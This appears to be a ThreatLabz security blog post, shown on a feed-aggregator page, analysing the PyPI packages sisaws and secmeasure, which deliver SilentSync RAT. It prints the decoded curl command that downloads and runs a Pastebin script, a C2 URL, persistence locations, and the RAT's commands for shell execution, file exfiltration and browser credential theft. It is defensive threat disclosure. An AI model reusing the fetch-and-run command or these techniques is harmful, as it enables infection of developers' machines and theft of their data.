惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Know Your Adversary
Know Your Adversary
小众软件
小众软件
L
LangChain Blog
月光博客
月光博客
博客园 - Franky
Microsoft Azure Blog
Microsoft Azure Blog
Y
Y Combinator Blog
有赞技术团队
有赞技术团队
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
MongoDB | Blog
MongoDB | Blog
Recorded Future
Recorded Future
V
Visual Studio Blog
TaoSecurity Blog
TaoSecurity Blog
S
Schneier on Security
C
Cybersecurity and Infrastructure Security Agency CISA
P
Privacy & Cybersecurity Law Blog
T
Threat Research - Cisco Blogs
D
DataBreaches.Net
L
LINUX DO - 热门话题
C
Check Point Blog
F
Fortinet All Blogs
Hugging Face - Blog
Hugging Face - Blog
The Hacker News
The Hacker News
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
Microsoft Security Blog
Microsoft Security Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
V
V2EX
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
The GitHub Blog
The GitHub Blog
P
Proofpoint News Feed
L
Lohrmann on Cybersecurity
博客园 - 司徒正美
T
Threatpost
P
Palo Alto Networks Blog
A
About on SuperTechFans
Spread Privacy
Spread Privacy
Engineering at Meta
Engineering at Meta
N
News | PayPal Newsroom
T
Tailwind CSS Blog
The Last Watchdog
The Last Watchdog
Blog — PlanetScale
Blog — PlanetScale
A
Arctic Wolf
量子位
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
博客园 - 聂微东
Google Online Security Blog
Google Online Security Blog
Google DeepMind News
Google DeepMind News
www.infosecurity-magazine.com
www.infosecurity-magazine.com
V
Vulnerabilities – Threatpost
H
Hacker News: Front Page

Security Research | Blog

ClaudeFix: Shared Claude Chats Meet ClickFix | Zscaler Why Do F1 Teams Need Cybersecurity, and What Is AI’s Role? Indirect Prompt Injection Targets AI Agents | ThreatLabz Splunk Enterprise RCE (CVE-2026-20253) | ThreatLabz Edgecution: Malicious Edge Extension Backdoor | ThreatLabz SmartApeSG Supply Chain Attack Targets Okendo | ThreatLabz AI Generated ClickFix Attack Delivers SmartRAT | ThreatLabz What the ThreatLabz 2026 Phishing and Initial Access Report Means for the Public Sector | Zscaler Shai-Hulud: Miasma, Hades, & AI Scanner Evasion | ThreatLabz Zscaler ThreatLabz 2026 Phishing and Initial Access Report Technical Analysis of MLTBackdoor | ThreatLabz When the Scanner Starts Thinking: Learnings from Mythos & GPT 5.5 Cyber in Security Testing | Zscaler OpenClaw Skill Distributes Remcos & GhostLoader | ThreatLabz Tropic Trooper: AdaptixC2 + Custom Beacon | ThreatLabz Do not delete blog (testing) | Zscaler Payouts King Takes Aim at the Ransomware Throne | ThreatLabz The Alibaba Incident and Why Zero Trust Matters More Than Ever In-Memory Loader Drops ScreenConnect | ThreatLabz Supply Chain Attacks Surge in March 2026 | ThreatLabz Claude Code Leak: Critical AI Security Threat 2026 Latest Xloader Obfuscation Code & C2 Protocol | ThreatLabz CVE-2026-20131: Analysis of FMC RCE | ThreatLabz Technical Analysis of SnappyClient | ThreatLabz China-nexus Group Targets Arabian Gulf Region | ThreatLabz Middle East Conflict Fuels Cyber Attacks | ThreatLabz Dust Specter APT Targets Gov’t Officials in Iraq | ThreatLabz APT37 Adds New Tools For Air-Gapped Networks | ThreatLabz GuLoader Malware Obfuscation Techniques Analyzed GuLoader Obfuscation Analysis | ThreatLabz Technical Analysis of Marco Stealer | ThreatLabz Latest Public Sector AI Adoption Trends: What Government, Healthcare, and Education Security Teams Need to Know | Zscaler Operation Neusploit: APT28 Uses CVE-2026-21509 | ThreatLabz 7 Predictions for 2026 | Zscaler SHEETCREEP, FIREPOWER, and MAILCREEP Analysis | ThreatLabz AI is Now Default Enterprise Accelerator: Takeaways from ThreatLabz 2026 AI Security Report | Zscaler GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz Malicious NPM Packages Deliver NodeCordRAT | ThreatLabz What’s Powering Enterprise AI in 2025: ThreatLabz Report Sneak Peek | Zscaler BlindEagle Deploys Caminho and DCRAT | ThreatLabz Technical Analysis of the BlackForce Phishing Kit | ThreatLabz React2Shell RCE Vulnerability (CVE-2025-55182) | ThreatLabz Shai-Hulud V2 Poses Risk to NPM Supply Chain | ThreatLabz Technical Analysis of Matanbuchus 3.0 | ThreatLabz In-Depth Analysis: Water Gamayun APT Multi-Stage Attack Uncovered CVE-2025-50165: Windows Graphics Component Flaw | ThreatLabz Mobile, IoT, and OT Risks Converge in the Public Sector | Zscaler Industry Attacks Surge, Mobile Malware Spreads: The ThreatLabz 2025 Mobile, IoT & OT Report | Zscaler Zscaler Discovers Vulnerability in Keras Models Allowing Arbitrary File Access and SSRF (CVE-2025-12058) | Zscaler F5 Security Incident Advisory | Zscaler Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface | Zscaler SEO Poisoning Targets Ivanti VPN: Credential Theft Alert Cisco Firewall and VPN Zero Day Attacks | ThreatLabz COLDRIVER Adds BAITSWITCH and SIMPLEFIX | ThreatLabz YiBackdoor: Linked to IcedID and Latrodectus | ThreatLabz Technical Analysis of Zloader Updates | ThreatLabz Mitigating Risks from the Shai-Hulud NPM Worm | ThreatLabz Technical Analysis of SmokeLoader Version 2025 | ThreatLabz Technical Analysis of kkRAT | ThreatLabz APT37: Rust Backdoor & Python Loader | ThreatLabz Anatsa’s Latest Updates | ThreatLabz Termncolor and Colorinal Explained | ThreatLabz GenAI Used to Impersonate Brazil’s Govt Websites | ThreatLabz Tracking Updates to Raspberry Robin | ThreatLabz Ransomware Surges, Extortion Escalates: ThreatLabz 2025 Ransomware Report | Zscaler China-nexus APT Targets the Tibetan Community | ThreatLabz CVE-2025-53770 | ThreatLabz Black Hat SEO Poisoning Search Engine Results For AI | ThreatLabz
Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz
Manisha Ramcharan Prajapati · 2025-09-18 · via Security Research | Blog

Technical Analysis

In the following section, we examine how the sisaws and secmeasure PyPI packages deliver SilentSync RAT. The figure below illustrates the attack sequence for both of these Python packages after they are installed from PyPI and the malicious functions are invoked.

Attack chain for two malicious Python packages discovered by ThreatLabz in the PyPI repository.

Figure 1: Attack chain for two malicious Python packages discovered by ThreatLabz in the PyPI repository.

Similarities between the sisaws and sisa packages

The sisaws package imitates the behavior of the legitimate Python package sisa, which includes the modules puco and renaper that act as wrappers around public government APIs for healthcare information. These modules enable applications to request the user’s National Identity Document (DNI) number, call the corresponding SISA web service, and return structured responses. For example, the puco module can be used to verify a citizen’s health coverage in the Unified Registry of Health Coverage (PUCO) database. The module provides functions to validate the DNI, query the puco endpoint, parse the XML response, and return the result as a Python dictionary. Similarly, the renaper module performs lookups against the National Registry of Persons (RENAPER) database. The output includes name, surname, date of birth, and social security coverage.

The sisaws package superficially mimics the behavior of the legitimate modules (puco and renaper). The sisaws package validates inputs just like the real package. For example, DNIs must be numeric and eight digits long, the tokens must be correct, and responses are wrapped in dictionaries. Even the success path imitates the real API’s responses by returning structured user data, expiration timestamps, and access roles. At a very quick glance, the sisaws package appears to be a legitimate Python library to interface with Argentina’s healthcare services.

However, the similarities are only surface-level. The sisaws package contains a function named gen_token in the initialization script (__init__.py) that acts as a backdoor malware downloader. This function contains a hardcoded token value (f5d3a8c2-4c01-47e2-a1a4-4dcb9a3d7e65) that must be provided as input. Any other input results in an error response. If the correct token is provided, the function returns a forged API-like response. This response contains structured data that mimics SISA services, including a user profile with a msal.gov.ar email address, assigned roles, and a token expiration timestamp. Additionally, a secondary static token (VAS7VSD89BDS86AFHASDBA9SD1) is issued for subsequent operations. 

A fake API response example is shown below: 

{
 "status": "success",
 "message": "Token válido",
 "user": {
   "id": 842,
   "username": "Jorge [removed]",
   "email": "[removed]@msal.gov.ar",
   "roles": ["user", "api_access", "webservices"],
   "token_expires": "2025-09-09T11:45:32.123456Z"
 },
 "token": "VAS7VSD89BDS86AFHASDBA9SD1"
}

The sisaws package’s search() function enforces the use of the secondary token. When the token is present, the function sends an HTTP GET request to a hardcoded endpoint, as shown in the example below:

http://200.58.107[.]25:2104/datalist?dni=&password=perro

The query sends the DNI value provided along with a static password. 

The response from the external server is processed in an unusual way. Instead of being parsed through a standard format such as JSON, the data is passed into Python’s ast.literal_eval() function after trimming the first four characters. This means the script expects the remote server to return Python literal structures, which are then evaluated directly in memory. Not only is this an unconventional parsing method, it also tightly couples the package’s functionality to the threat actor’s server-side output format.

If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script, as shown below.

curl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\\helper.py && python %TEMP%\\helper.py

The Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed. Note that the Python package currently only targets Windows systems, although SilentSync has built-in features for Linux and macOS as well.

Similarities between the sisaws and secmeasure packages

ThreatLabz identified another Python package in PyPI named secmeasure that was uploaded by the same author ([email protected]) as the sisaws package. While secmeasure’s description claims the package is a “library for cleaning strings and applying security measures”, in reality, secmeasure behaves similarly to sisaws. The secmeasure package includes various string manipulation functions, but the primary purpose is to deploy malware. The following is an overview of the legitimate functions supported by secmeasure:

  • strip_whitespace(s): Removes extra whitespace.
  • remove_special_chars(s): Removes non-alphanumeric/whitespace characters.
  • escape_html(s): Escapes HTML special characters.
  • normalize_unicode(s): Converts Unicode to ASCII equivalents.
  • sanitize_command(s): Sanitizes input for shell commands.
  • hex_a_str(hex_string): Decodes hex into strings.

However, the secmeasure package will raise NameError exceptions for the rehtml, and unicodedata modules not being imported properly.

Similar to sisaws, the secmeasure initialization script contains a malicious function named sanitize_input, that when invoked, will execute the same hex-encoded curl command used by the sisaws package to distribute SilentSync RAT.

The author for sisaws and secmeasure was quite active at the beginning of August, with four releases in two days as shown in the table below.

Package Name

Version

Uploaded Date

secmeasure

0.1.0

03, Aug 2025

secmeasure

0.1.1

03, Aug 2025

secmeasure

0.1.2

04, Aug 2025

sisaws

2.1.6

04, Aug 2025

Table 1: Version information for the sisaws and secmeasure packages.

The existence of multiple versions and packages suggests the threat actor may have been experimenting with various methods and lures. 

In addition to behavioral similarities, the metadata of the secmeasure and sisaws packages overlap including the email address and even the package name, as shown in the figure below.

A comparison of the secmeasure and sisaws package metadata.

Figure 2: A comparison of the secmeasure and sisaws package metadata.

SilentSync RAT

The malicious script downloaded by sisaws and secmeasure is SilentSync, a Python-based RAT with remote access and data collection capabilities.

Persistence across different operating systems

SilentSync achieves persistence by using platform-specific techniques to ensure it runs automatically after system reboots or user logins. (Note that the malicious Python packages themselves currently only infect Windows systems.)

  • On Windows, SilentSync creates a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key with the name PyHelper to launch the script.
  • On Linux, SilentSync modifies the crontab with an @reboot directive to execute the payload at startup.
  • For macOS, SilentSync generates a com.apple.pyhelper.plist file in the ~/Library/LaunchAgents directory to register itself as a launch agent.

C2 communication

SilentSync communicates with its C2 server over HTTP to a hardcoded server whose IP address (200.58.107[.]25) is stored in Base64 and decoded at runtime. The network protocol implements a REST API using TCP port 5000. The REST endpoints in the table below are used to perform key functions.

Endpoint

Function

/checkin

Beacon to verify connectivity

/comando

Request commands to execute

/respuesta

Send a status message

/archivo

Send command output / stolen data

Table 2: REST API endpoints used by SilentSync to perform key actions.

Remote operation and exfiltration

SilentSync is capable of harvesting browser data, executing shell commands, capturing screenshots, and stealing files. File exfiltration can be performed for entire directories (and compressed into ZIP archives) or for individual files. After exfiltration, all artifacts are deleted from the infected system to avoid detection.

SilentSync supports the commands in the table below:

Command

Description

cmd

Execute a shell command and return the output.

get

Exfiltrate files or a directory. If the specified argument ends with the characters /*, the RAT interprets the value as a directory, compresses the contents into a ZIP archive, and uploads the result.

screenshot

Capture a screenshot of the victim’s desktop.

upload

Notify the server that a file upload is pending.

browserdata

Steal browser data (currently Windows only).

Table 3: Commands supported by SilentSync.

Note that the browserdata command is currently supported on Windows only. When invoked, the client enumerates local profiles for Chromium-family browsers (Chrome, Edge, Brave) and Firefox, harvesting four categories per profile: history, autofill, cookies, and saved credentials.